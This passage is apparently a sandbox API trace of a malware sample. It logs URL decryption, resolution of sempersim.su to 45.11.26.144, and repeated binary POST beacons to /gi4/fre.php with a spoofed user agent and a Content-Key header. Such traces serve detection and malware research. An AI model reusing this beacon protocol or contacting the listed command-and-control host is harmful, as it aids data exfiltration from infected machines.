Size=0x7d) returned 0x5c5e60 [0160.505] GetProcessHeap () returned 0x5b0000 [0160.505] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0160.506] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0160.507] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0160.507] GetProcessHeap () returned 0x5b0000 [0160.507] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0160.507] GetProcessHeap () returned 0x5b0000 [0160.508] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0160.508] GetProcessHeap () returned 0x5b0000 [0160.508] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2f60 [0160.508] GetProcessHeap () returned 0x5b0000 [0160.508] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0160.510] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0160.510] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0160.510] GetProcessHeap () returned 0x5b0000 [0160.510] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5ce180 [0160.510] GetProcessHeap () returned 0x5b0000 [0160.511] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0160.511] send (s=0x2a8, buf=0x5ce180*, len=236, flags=0) returned 236 [0160.512] send (s=0x2a8, buf=0x5d1e18*, len=159, flags=0) returned 159 [0160.513] GetProcessHeap () returned 0x5b0000 [0160.513] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0160.513] recv (in: s=0x2a8, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0162.132] GetProcessHeap () returned 0x5b0000 [0162.132] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ce180 | out: hHeap=0x5b0000) returned 1 [0162.132] GetProcessHeap () returned 0x5b0000 [0162.133] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2f60 | out: hHeap=0x5b0000) returned 1 [0162.133] GetProcessHeap () returned 0x5b0000 [0162.133] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0162.133] GetProcessHeap () returned 0x5b0000 [0162.133] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5e60 | out: hHeap=0x5b0000) returned 1 [0162.133] closesocket (s=0x2a8) returned 0 [0162.134] GetProcessHeap () returned 0x5b0000 [0162.134] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8d0 | out: hHeap=0x5b0000) returned 1 [0162.134] GetProcessHeap () returned 0x5b0000 [0162.135] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d54c0 | out: hHeap=0x5b0000) returned 1 [0162.135] GetProcessHeap () returned 0x5b0000 [0162.135] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3350 | out: hHeap=0x5b0000) returned 1 [0162.135] GetProcessHeap () returned 0x5b0000 [0162.136] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0162.136] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x10c4) returned 0x2a8 [0162.138] Sleep (dwMilliseconds=0xea60) [0162.140] GetProcessHeap () returned 0x5b0000 [0162.140] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d31e8 [0162.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0162.141] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0162.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0162.152] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5a20) returned 1 [0162.164] GetProcessHeap () returned 0x5b0000 [0162.164] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0162.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0162.165] CryptImportKey (in: hProv=0x5c5a20, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0162.166] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0162.166] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0162.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0162.167] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0162.167] GetProcessHeap () returned 0x5b0000 [0162.168] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0162.169] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0162.169] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d31e8, pdwDataLen=0xdfcfc | out: pbData=0x5d31e8, pdwDataLen=0xdfcfc) returned 1 [0162.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0162.170] CryptDestroyKey (hKey=0x5be048) returned 1 [0162.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0162.192] CryptReleaseContext (hProv=0x5c5a20, dwFlags=0x0) returned 1 [0162.192] GetProcessHeap () returned 0x5b0000 [0162.192] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0162.193] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0162.193] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0162.194] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0162.194] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0162.194] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0162.195] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0162.195] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0162.195] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0162.195] GetProcessHeap () returned 0x5b0000 [0162.195] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0162.196] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0162.196] GetProcessHeap () returned 0x5b0000 [0162.197] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0162.197] GetProcessHeap () returned 0x5b0000 [0162.197] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0162.197] GetProcessHeap () returned 0x5b0000 [0162.198] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0162.198] GetProcessHeap () returned 0x5b0000 [0162.198] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3038 [0162.198] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0162.198] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0162.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0162.310] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5998) returned 1 [0162.381] GetProcessHeap () returned 0x5b0000 [0162.381] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0162.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0162.382] CryptImportKey (in: hProv=0x5c5998, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0162.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0162.383] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0162.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0162.384] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0162.384] GetProcessHeap () returned 0x5b0000 [0162.384] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0162.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0162.393] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3038, pdwDataLen=0xdfcfc | out: pbData=0x5d3038, pdwDataLen=0xdfcfc) returned 1 [0162.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0162.399] CryptDestroyKey (hKey=0x5be288) returned 1 [0162.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0162.400] CryptReleaseContext (hProv=0x5c5998, dwFlags=0x0) returned 1 [0162.400] GetProcessHeap () returned 0x5b0000 [0162.400] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0162.400] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0162.401] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0162.401] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0162.402] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0162.402] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0162.403] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0162.403] GetProcessHeap () returned 0x5b0000 [0162.403] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0162.403] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdbb0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0162.463] GetProcessHeap () returned 0x5b0000 [0162.463] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8d0 [0162.463] socket (af=2, type=1, protocol=6) returned 0x2ac [0162.463] connect (s=0x2ac, name=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0162.538] FreeAddrInfoW (pAddrInfo=0x5cdbb0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0162.538] GetProcessHeap () returned 0x5b0000 [0162.538] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5a20 [0162.538] GetProcessHeap () returned 0x5b0000 [0162.538] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0162.538] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0162.539] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0162.540] GetProcessHeap () returned 0x5b0000 [0162.540] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0162.540] GetProcessHeap () returned 0x5b0000 [0162.540] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0162.540] GetProcessHeap () returned 0x5b0000 [0162.540] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2ff0 [0162.540] GetProcessHeap () returned 0x5b0000 [0162.540] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0162.541] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0162.542] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0162.542] GetProcessHeap () returned 0x5b0000 [0162.542] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5ce180 [0162.542] GetProcessHeap () returned 0x5b0000 [0162.542] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0162.543] send (s=0x2ac, buf=0x5ce180*, len=236, flags=0) returned 236 [0162.543] send (s=0x2ac, buf=0x5d1e18*, len=159, flags=0) returned 159 [0162.543] GetProcessHeap () returned 0x5b0000 [0162.543] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0162.543] recv (in: s=0x2ac, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0164.023] GetProcessHeap () returned 0x5b0000 [0164.024] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ce180 | out: hHeap=0x5b0000) returned 1 [0164.024] GetProcessHeap () returned 0x5b0000 [0164.024] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2ff0 | out: hHeap=0x5b0000) returned 1 [0164.024] GetProcessHeap () returned 0x5b0000 [0164.025] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0164.025] GetProcessHeap () returned 0x5b0000 [0164.025] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5a20 | out: hHeap=0x5b0000) returned 1 [0164.025] closesocket (s=0x2ac) returned 0 [0164.026] GetProcessHeap () returned 0x5b0000 [0164.026] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8d0 | out: hHeap=0x5b0000) returned 1 [0164.026] GetProcessHeap () returned 0x5b0000 [0164.027] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0164.027] GetProcessHeap () returned 0x5b0000 [0164.027] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3038 | out: hHeap=0x5b0000) returned 1 [0164.027] GetProcessHeap () returned 0x5b0000 [0164.028] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0164.042] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x10d4) returned 0x2ac [0164.043] Sleep (dwMilliseconds=0xea60) [0164.046] GetProcessHeap () returned 0x5b0000 [0164.046] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d31e8 [0164.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0164.047] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0164.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0164.054] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0164.061] GetProcessHeap () returned 0x5b0000 [0164.061] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8620 [0164.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0164.067] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8620, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0164.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0164.068] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0164.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0164.069] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0164.069] GetProcessHeap () returned 0x5b0000 [0164.070] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8620 | out: hHeap=0x5b0000) returned 1 [0164.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0164.071] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d31e8, pdwDataLen=0xdfcfc | out: pbData=0x5d31e8, pdwDataLen=0xdfcfc) returned 1 [0164.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0164.072] CryptDestroyKey (hKey=0x5bde08) returned 1 [0164.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0164.073] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0164.073] GetProcessHeap () returned 0x5b0000 [0164.073] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d56e8 [0164.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0164.074] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0164.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0164.075] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0164.076] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0164.076] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0164.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0164.077] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0164.077] GetProcessHeap () returned 0x5b0000 [0164.077] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0164.084] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0164.084] GetProcessHeap () returned 0x5b0000 [0164.084] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0164.085] GetProcessHeap () returned 0x5b0000 [0164.085] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d56e8 | out: hHeap=0x5b0000) returned 1 [0164.085] GetProcessHeap () returned 0x5b0000 [0164.085] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0164.085] GetProcessHeap () returned 0x5b0000 [0164.085] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3398 [0164.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0164.086] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0164.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0164.092] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0164.104] GetProcessHeap () returned 0x5b0000 [0164.104] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8590 [0164.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0164.105] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8590, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0164.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0164.106] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0164.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0164.107] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0164.107] GetProcessHeap () returned 0x5b0000 [0164.107] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8590 | out: hHeap=0x5b0000) returned 1 [0164.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0164.108] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3398, pdwDataLen=0xdfcfc | out: pbData=0x5d3398, pdwDataLen=0xdfcfc) returned 1 [0164.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0164.112] CryptDestroyKey (hKey=0x5be048) returned 1 [0164.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0164.113] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0164.113] GetProcessHeap () returned 0x5b0000 [0164.113] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5f88 [0164.113] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0164.114] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0164.114] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0164.115] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0164.115] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0164.115] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0164.115] GetProcessHeap () returned 0x5b0000 [0164.115] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0164.116] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdf20*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0164.117] GetProcessHeap () returned 0x5b0000 [0164.117] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca960 [0164.117] socket (af=2, type=1, protocol=6) returned 0x2b0 [0164.117] connect (s=0x2b0, name=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0164.187] FreeAddrInfoW (pAddrInfo=0x5cdf20*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0164.187] GetProcessHeap () returned 0x5b0000 [0164.187] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5dd8 [0164.187] GetProcessHeap () returned 0x5b0000 [0164.187] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0164.187] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0164.188] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0164.188] GetProcessHeap () returned 0x5b0000 [0164.188] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0164.188] GetProcessHeap () returned 0x5b0000 